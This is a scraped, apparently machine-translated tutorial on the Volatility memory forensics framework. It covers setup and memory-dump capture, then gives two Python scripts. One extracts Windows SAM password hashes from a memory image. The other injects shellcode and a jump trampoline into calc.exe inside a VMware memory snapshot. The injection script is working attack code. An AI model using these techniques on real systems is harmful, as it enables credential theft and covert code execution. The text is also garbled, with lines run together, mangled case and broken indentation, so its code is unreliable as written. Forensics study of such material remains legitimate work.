Python automatic attack script

Automated attack forensics 1. volatility--Advanced Memory Forensics Framework Tool

After the network has been compromised, it is necessary to verify if an attack event has occurred, usually requiring a memory snapshot of the infected host. You can use volatility to perform tasks such as kernel object checking, process memory detection and extraction, and provide forensic analysis capabilities.

Volatility

1.1 Environment construction and dump crawl

Environment needs python2.7

• Windows Python Environment installation Anaconda

• Coexistence of Windows Anaconda2 (Python2) and Anaconda3 (Python3)

  1.1.1 Windows

  Run volatility

  python vol.py -h

1.1.2 Linux (Kali)

Switch to the volatility directory with the shell

1.1.3 Generating a memory dump file

Volatility is analyzing the memory dump file, so we need to crawl the memory dump on a system that is suspected of being attacked. There are 3 main ways to crawl memory dumps.

• Using cuckoo sandbox to generate memory dump features
• Using VMware to generate memory dump features
• Use third-party software to crawl memory dump

1.1.41.1.5 using VMware

Pause the virtual machine system, and then locate the *.vmem in the corresponding directory, for example:

1.1.6 using third-party software to crawl

For physical machines, you can often use the following tools to crawl memory dumps:

KnTToolsF-ResponseMandiant MemoryzeHBGary FastDumpMoonSols Windows Memory ToolkitAccessData FTK ImagerEnCase/WinEnBelkasoft Live RAM CapturerATC-NY Windows Memory ReaderWinpmemWin32dd/Win64ddDumpIt

1.2 Tools Use 1.2.1 behavior: Fetch password hash value

Import Sysimport structmemory_file = "Winxpsp2.vmem" Sys.path.append ("/downloads/volatility-2.3.1") Import volatility . conf as Confimport Volatility.registry as Registryregistry. Pluginimporter () config = conf. Confobject () Import volatility.commands as Commandsimport Volatility.addrspace as Addrspaceconfig.parse_options () Config. Profile = "winxpsp2x86" config. Location = "file://%s"% memory_fileregistry.register_global_options (config, commands. Command) registry.register_global_options (config, addrspace. Baseaddressspace) from Volatility.plugins.registry.registryapi import Registryapifrom Volatility.plugins.registry.lsadump Import hashdumpregistry = registryapi (config) registry.populate_offsets () SAM_ offset = Nonesys_offset = nonefor offset in registry.all_offsets:if registry.all_offsets[offset].endswith ("\\SAM") : Sam_offset = offset print "[*] sam:0x%08x"% offset if registry.all_offsets[offset].endswith ("\\sy Stem "): Sys_offset = offset print" [*]system:0x%08x "% offset if sam_offset is not None and sys_offset is not None:config.sys_offset = SYS_OFFSE T config.sam_offset = Sam_offset hashdump = hashdump (config) for hash in hashdump.cal Culate (): Print hash breakif sam_offset is None or sys_offset are None:print "[*] Failed to F IND the system or SAM offsets.

1.2.2 Behavior: Direct code injection

Import Sysimport Structequals_button = 0x01005d51memory_file = "/users/justin/documents/virtual Machines.localized/W indows Server 2003 Standard Edition.vmwarevm/564d9400-1cb2-63d6-722b-4ebe61759abd.vmem "slack_space = Nonetrampoline_ offset = none# read in our SHELLCODESC_FD = open ("Cmeasure.bin", "RB") sc = Sc_fd.read () sc_fd.close () sys.path.append ("/do wnloads/volatility-2.3.1 ") Import volatility.conf as Confimport volatility.registry as Registryregistry. Pluginimporter () config = conf. Confobject () Import volatility.commands as Commandsimport Volatility.addrspace as Addrspaceregistry.register_global_ Options (config, commands.command) registry.register_global_options (config, addrspace. Baseaddressspace) config.parse_options () config. Profile = "win2003sp2x86" config. Location = "file://%s"% memory_fileimport volatility.plugins.taskmods as TASKMODSP = Taskmods. PSList (config) for process in P.calculate (): If STR (process. imagefilename) = = "Calc.exe": print "[*] Found Calc. exe with PID%d "% process.                UNIQUEPROCESSID print "[*] hunting for physical offsets...please wait."                Address_space = Process.get_process_address_space () pages = Address_space.get_available_pages ()                                    For page in pages:physical = Address_space.vtop (page[0]) If physical are not None: If slack_space is NONE:FD = open (Memory_file, "r+ ") Fd.seek (physical) buf = Fd.read (page[1]) t                                                Ry:offset = Buf.index ("\x00" * Len (SC)) Slack_space = page[0] + offset                        Print "[*] Found good shellcode location!" Print "[*] Virtual address:0x%08x"% slack_space print "[*] Physical address:0x%08x"% (physical + offset) PRINT "[*] injecting shellcode."                                                Fd.seek (physical + offset) Fd.write (SC) Fd.flush () # Create our trampoline tramp = "\xbb%s"% struct.pack ("<l", page[0] + off  Set) Tramp + = "\xff\xe3" If Trampoline_offset is not                                        None:break Except:pass                Fd.close () # Check for we target code location                                        If page[0] <= Equals_button and Equals_button < ((Page[0] + page[1])-7):                                        # calculate virtual Offset V_offset = equals_button-page[0] # Now calculate physical offset TRAMPOLINE_OFFSEt = physical + v_offset print "[*] Found our trampoline target at:0x%08x"% (tramp                        Oline_offset) If Slack_space is not none:break         Print "[*] Writing trampoline ..." FD = open (Memory_file, "r+") Fd.seek (Trampoline_offset)                Fd.write (Tramp) fd.close () print "[*] done injecting code."

Python automatic attack script